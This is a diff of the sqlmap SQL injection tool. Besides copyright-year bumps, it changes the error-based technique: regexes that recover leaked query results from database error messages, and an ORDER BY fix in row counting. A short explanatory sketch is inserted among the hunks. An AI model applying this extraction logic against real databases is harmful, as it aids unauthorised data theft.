-                        dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
+                        dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))

                         if count > 0:
                             hashDBWrite(expression, output)

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -74,7 +74,7 @@ def _oneShotErrorUse(expression, field=None):
     try:
         while True:
             check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
-            trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start)
+            trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start)

             if field:
                 nulledCastedField = agent.nullAndCastField(field)
||||||
|
@@ -130,6 +130,16 @@ def _oneShotErrorUse(expression, field=None):
                     warnMsg += safecharencode(trimmed)
                     logger.warn(warnMsg)

+                    if not kb.testMode:
+                        check = "(?P<result>.*?)%s" % kb.chars.stop[:2]
+                        output = extractRegexResult(check, trimmed, re.IGNORECASE)
+
+                        if not output:
+                            check = "(?P<result>[^\s<>'\"]+)"
+                            output = extractRegexResult(check, trimmed, re.IGNORECASE)
+                        else:
+                            output = output.rstrip()
+
                 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)):
                     if offset == 1:
                         retVal = output

@@ -271,7 +281,7 @@ def errorUse(expression, dump=False):
         # Count the number of SQL query entries output
         countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)

-        if " ORDER BY " in expression.upper():
+        if " ORDER BY " in countedExpression.upper():
            _ = countedExpression.upper().rindex(" ORDER BY ")
            countedExpression = countedExpression[:_]

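The corrected condition can be exercised on its own: the ORDER BY clause has to be looked up in the rewritten COUNT expression, because that is the string being truncated. A minimal sketch with a made-up query:

    expression = "SELECT name, surname FROM users ORDER BY name"
    expressionFields = "name, surname"

    # rewrite the projected fields into a COUNT(*) so the number of entries can be fetched first
    countedExpression = expression.replace(expressionFields, "COUNT(*)", 1)

    if " ORDER BY " in countedExpression.upper():
        _ = countedExpression.upper().rindex(" ORDER BY ")
        countedExpression = countedExpression[:_]

    print(countedExpression)   # SELECT COUNT(*) FROM users
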
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """